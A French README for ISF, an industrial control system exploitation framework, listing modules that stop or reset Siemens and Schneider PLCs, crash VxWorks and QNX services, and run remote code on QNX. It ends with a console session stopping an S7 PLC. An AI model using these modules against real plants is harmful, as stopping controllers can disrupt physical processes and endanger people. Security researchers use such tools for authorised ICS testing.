ISF (Industrial Exploitation Framework) est un framework d'exploitation basé sur Python, il est similaire au framework metasploit.
ISF est basé sur le projet open source routersploit.
Lisez ceci dans d'autres langues : anglais, 简体中文,
L’utilisation de l’ISF pour attaquer des cibles sans consentement mutuel préalable est illégale. Il est de la responsabilité de l'utilisateur final de respecter toutes les lois locales, étatiques et fédérales applicables. Les développeurs n'assument aucune responsabilité et ne sont pas responsables de toute mauvaise utilisation ou dommage causé par ce programme.
Nom | Chemin | Description |
---|---|---|
modbus_tcp_client | icssploit/clients/modbus_tcp_client.py | Client Modbus-TCP |
wdb2_client | icssploit/clients/wdb2_client.py | Client WdbRPC version 2 (Vxworks 6.x) |
s7_client | icssploit/clients/s7_client.py | Client s7comm (automate S7 300/400) |
Nom | Chemin | Description |
---|---|---|
s7_300_400_plc_control | exploits/plcs/siemens/s7_300_400_plc_control.py | Démarrage/arrêt de l'automate S7-300/400 |
s7_1200_plc_control | exploits/plcs/siemens/s7_1200_plc_control.py | Démarrage/arrêt/réinitialisation de l'automate S7-1200 |
vxworks_rpc_dos | exploits/plcs/vxworks/vxworks_rpc_dos.py | Dos distant Vxworks RPC (CVE-2015-7599) |
quantum_140_plc_control | exploits/plcs/schneider/quantum_140_plc_control.py | Démarrage/arrêt de l'automate Schneider Quantum série 140 |
crash_qnx_inetd_tcp_service | exploits/plcs/qnx/crash_qnx_inetd_tcp_service.py | Service TCP QNX Inetd dos |
qconn_remote_exec | exploits/plcs/qnx/qconn_remote_exec.py | Exécution de code à distance QNX qconn |
profinet_set_ip | exploits/plcs/siemens/profinet_set_ip.py | Configuration IP du périphérique Profinet DCP |
Nom | Chemin | Description |
---|---|---|
profinet_dcp_scan | scanners/profinet_dcp_scan.py | Scanner Profinet DCP |
vxworks_6_scan | scanners/vxworks_6_scan.py | Scanner Vxworks 6.x |
s7comm_scan | scanners/s7comm_scan.py | Scanner S7comm |
enip_scan | scanners/enip_scan.py | Scanner EthernetIP |
Ces protocoles peuvent être utilisés dans d'autres frameworks Fuzzing comme Kitty ou créer votre propre client.
Nom | Chemin | Description |
---|---|---|
pn_dcp | icssploit/protocoles/pn_dcp | Protocole Profinet DCP |
modbus_tcp | icssploit/protocoles/modbus_tcp | Protocole Modbus-TCP |
wdbrpc2 | icssploit/protocoles/wdbrpc2 | Protocole WDB RPC version 2 |
s7com | icssploit/protocoles/s7comm.py | Protocole S7comm |
git clone https://github.com/dark-lbp/isf/
cd isf
python isf.py
root@kali:~/Desktop/temp/isf# python isf.py
_____ _____ _____ _____ _____ _ ____ _____ _______
|_ _/ ____|/ ____/ ____| __ | | / __ _ _|__ __|
| || | | (___| (___ | |__) | | | | | || | | |
| || | ___ \___ | ___/| | | | | || | | |
_| || |____ ____) |___) | | | |___| |__| || |_ | |
|__________|_____/_____/|_| |__________/_____| |_|
ICS Exploitation Framework
Note : ICSSPOLIT is fork from routersploit at
https://github.com/reverse-shell/routersploit
Dev Team : wenzhe zhu(dark-lbp)
Version : 0.1.0
Exploits: 2 Scanners: 0 Creds: 13
ICS Exploits:
PLC: 2 ICS Switch: 0
Software: 0
isf >
isf > use exploits/plcs/
exploits/plcs/siemens/ exploits/plcs/vxworks/
isf > use exploits/plcs/siemens/s7_300_400_plc_control
exploits/plcs/siemens/s7_300_400_plc_control
isf > use exploits/plcs/siemens/s7_300_400_plc_control
isf (S7-300/400 PLC Control) >
Vous pouvez utiliser la touche de tabulation pour terminer.
isf (S7-300/400 PLC Control) > show options
Target options:
Name Current settings Description
---- ---------------- -----------
target Target address e.g. 192.168.1.1
port 102 Target Port
Module options:
Name Current settings Description
---- ---------------- -----------
slot 2 CPU slot number.
command 1 Command 0:start plc, 1:stop plc.
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > set target 192.168.70.210
[+] {'target': '192.168.70.210'}
isf (S7-300/400 PLC Control) > run
[*] Running module...
[+] Target is alive
[*] Sending packet to target
[*] Stop plc
isf (S7-300/400 PLC Control) >
isf (S7-300/400 PLC Control) > show info
Name:
S7-300/400 PLC Control
Description:
Use S7comm command to start/stop plc.
Devices:
- Siemens S7-300 and S7-400 programmable logic controllers (PLCs)
Authors:
- wenzhe zhu
References:
isf (S7-300/400 PLC Control) >